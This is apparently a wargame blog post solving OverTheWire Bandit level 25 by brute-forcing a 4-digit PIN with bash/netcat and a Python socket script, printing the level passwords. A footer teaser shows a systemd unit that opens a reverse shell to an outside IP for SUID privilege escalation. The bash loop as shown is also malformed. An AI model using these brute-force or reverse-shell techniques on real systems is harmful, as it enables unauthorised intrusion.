Skip to main content

Over the Wire - Bandit 25

Bandit 25

 Objectives

 A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Solution

 a bit frustrated with this one

I spent way to long on this because my connect to the daemon would time out. I was only getting to around try 7000 and of course the correct port was beyond that

First I generate a pass list to throw at netcat

​I've started with just 8000 - 9999

#! /bin/bash
hash=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {8000..9999}doecho $hash $i > pass.txt
done
which generates a pass.txt file with lines like this in itUoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9978UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9979UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9980UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9981UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9982UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9983UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9984




Then I throw that at netcat with a grep filter to  filter out wrong as a response


$ cat pass.txt | netcat localhost 30002 | grep -vE 'Wrong'


I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.Correct!The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
now in python
I attacked this one a little different using a socket instead of netcat to pass the values to the daemon. That eliminated my need to create a txt of all possible combos. I instead wrote the response from the daemon to a file that I could grep... knowing the correct port I started the brute force at 8500

import os,socket
pass24 = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
counter = 8500
f= open("tries.txt","w+")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = 'localhost'
port = 30002
s.connect((host,port))
for x in range(500):
 stringy = str(counter)
 all = pass24 + ' ' + stringy + '\n'
 s.send(all)
 attempt = s.recv(1024).decode() + stringy + '    '
 counter = counter + 1
 f.write(attempt)



then a quick grep of the tries txt files give us the answer

bandit24@bandit:/tmp/asmithbandit25$ grep bandit tries.txtI am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG





Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more